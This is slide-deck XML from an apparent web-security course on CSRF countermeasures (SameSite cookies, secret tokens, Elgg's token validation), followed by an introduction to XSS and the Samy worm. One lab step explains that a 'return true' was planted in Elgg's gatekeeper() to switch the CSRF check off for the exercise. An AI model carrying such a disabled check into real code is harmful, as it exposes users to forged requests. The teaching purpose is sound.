              <a:t>This field reveals part of browsing history causing privacy concern and hence, this field is mostly removed from the header.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The server cannot use this unreliable source.</a:t>
            </a:r>
            <a:endParaRPr>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Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Countermeasures: Same-Site Cookies</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="38973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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A special type of cookie in browsers like Chrome and Opera, which provide a special attribute to cookies called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This attribute is set by the servers and it tells the browsers whether a cookie should be attached to a cross-site request or not.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookies with this attribute are always sent along with same-site requests, but whether they are sent along with cross-site depends on the value of this attribute.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Values</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="800100" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strict (Not sent along with cross-site requests)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="800100" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lax (Sent with cross-site requests)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2400"/>
              <a:t>Countermeasures: Secret Token</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="38973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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The server embeds a random secret value inside each web page. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When a request is initiated from this page, the secret value is included with the request. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The server checks this value to see whether a request is cross-site or not.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pages from a different origin will not be able to access the secret value. This is guaranteed by browsers (the same origin policy)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The secret is randomly generated and is different for different users. So, there is no way for attackers to guess or find out this secret.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>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 sz="2400"/>
              <a:t>Elgg’s Countermeasure</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="Google Shape;452;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="12426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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uses secret-token approach : _elgg_tc and _elgg_token.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The values are stored inside two JavaScript variables and also in all the forms where user action is required.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="453" name="Google Shape;453;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="439325" y="2338800"/>
            <a:ext cx="7537551" cy="465900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370125" y="3135450"/>
            <a:ext cx="8520600" cy="1552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The two hidden parameters are added to the form so that when the form is submitted via an HTTP request, these two values are included in the request.</a:t>
            </a:r>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These two hidden values are generated by the server (views/default/input/securitytoken.php) and added as a hidden field in each page.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2400"/>
              <a:t>Elgg’s Countermeasure</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="460" name="Google Shape;460;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="382125" y="1170125"/>
            <a:ext cx="5910049" cy="1321325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="Google Shape;461;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6522000" y="1322650"/>
            <a:ext cx="2310300" cy="86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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Code to dynamically add the values to the web page.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="462" name="Google Shape;462;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="382125" y="2643850"/>
            <a:ext cx="4018000" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Google Shape;463;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6623350" y="2419500"/>
            <a:ext cx="2310300" cy="86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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>JavaScript variables to access using JavaScript code.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Google Shape;464;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421175" y="3365175"/>
            <a:ext cx="8520600" cy="155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Elgg’s security token is a MD5 digest of four pieces of information : </a:t>
            </a:r>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Site secret value</a:t>
            </a:r>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Timestamp</a:t>
            </a:r>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User session ID </a:t>
            </a:r>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Randomly generated session string</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="465" name="Google Shape;465;p80"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="463" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4786150" y="2853600"/>
            <a:ext cx="1837200" cy="1200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="466" name="Google Shape;466;p80"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4684800" y="1550875"/>
            <a:ext cx="1837200" cy="1200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="lg" w="lg"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2400"/>
              <a:t>Elgg’s Countermeasure</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="472" name="Google Shape;472;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1170125"/>
            <a:ext cx="5731351" cy="2162775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="Google Shape;473;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6113500" y="2313450"/>
            <a:ext cx="2769900" cy="117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Code to generate secret token and session string _elgg_session.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="474" name="Google Shape;474;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3332900"/>
            <a:ext cx="5731350" cy="117566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 sz="2400"/>
              <a:t>Elgg’s Countermeasure</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="480" name="Google Shape;480;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257575" y="1118464"/>
            <a:ext cx="6224491" cy="3820975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Google Shape;481;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6427941" y="966067"/>
            <a:ext cx="2512500" cy="3650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The Elgg server validates the generated token and timestamp to defend against CSRF attacks.</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Every user action calls validate_action_token() to validate the token.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 sz="2400"/>
              <a:t>Turn on Elgg’s Countermeasure</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Google Shape;487;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1435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1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/var/www/CSRF/Elgg/vendor/elgg/elgg/engine/classes/Elgg/ActionService.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and find the function gatekeeper()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> comment out t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>he statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “return true”. This line was added to disable the countermeasure and let all the requests pass the check. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="488" name="Google Shape;488;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="696875" y="2381550"/>
            <a:ext cx="6398267" cy="22504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The Cross-Site Scripting Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="494" name="Google Shape;494;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="455750" y="1017725"/>
            <a:ext cx="4700601" cy="2673275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="Google Shape;495;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5209524" y="919572"/>
            <a:ext cx="3640500" cy="3807411"/>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In XSS, an attacker injects his/her malicious code to the victim’s browser via the target website.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="6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When code comes from a website, it is considered as trusted with respect to the website, so it can access and change the content on the pages, read cookies belonging to the website and sending out requests on behalf of the user.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Google Shape;496;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227562" y="3991632"/>
            <a:ext cx="5066100" cy="1020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Basically, code can do whatever the user can do inside the session.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="Google Shape;497;p84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813303" y="1456841"/>
            <a:ext cx="1852046" cy="945396"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd fmla="val 16062036" name="adj1"/>
              <a:gd fmla="val 2358492" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="med" w="med" type="triangl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5"/>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Samy Worms</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Google Shape;503;p85"/>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Samy (also known as JS.Spacehero) is a cross-site scripting worm (XSS worm) that was designed to propagate across the social networking site MySpace by Samy Kamkar. Within just 20 hours of its October 4, 2005 release, over one million users had run the payload, making Samy the fastest spreading virus of all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2"/>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Request and Reply</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;p32"/>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32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017724"/>
            <a:ext cx="5550375" cy="1869867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="134" name="Google Shape;134;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2682975"/>
            <a:ext cx="5550366" cy="2105025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
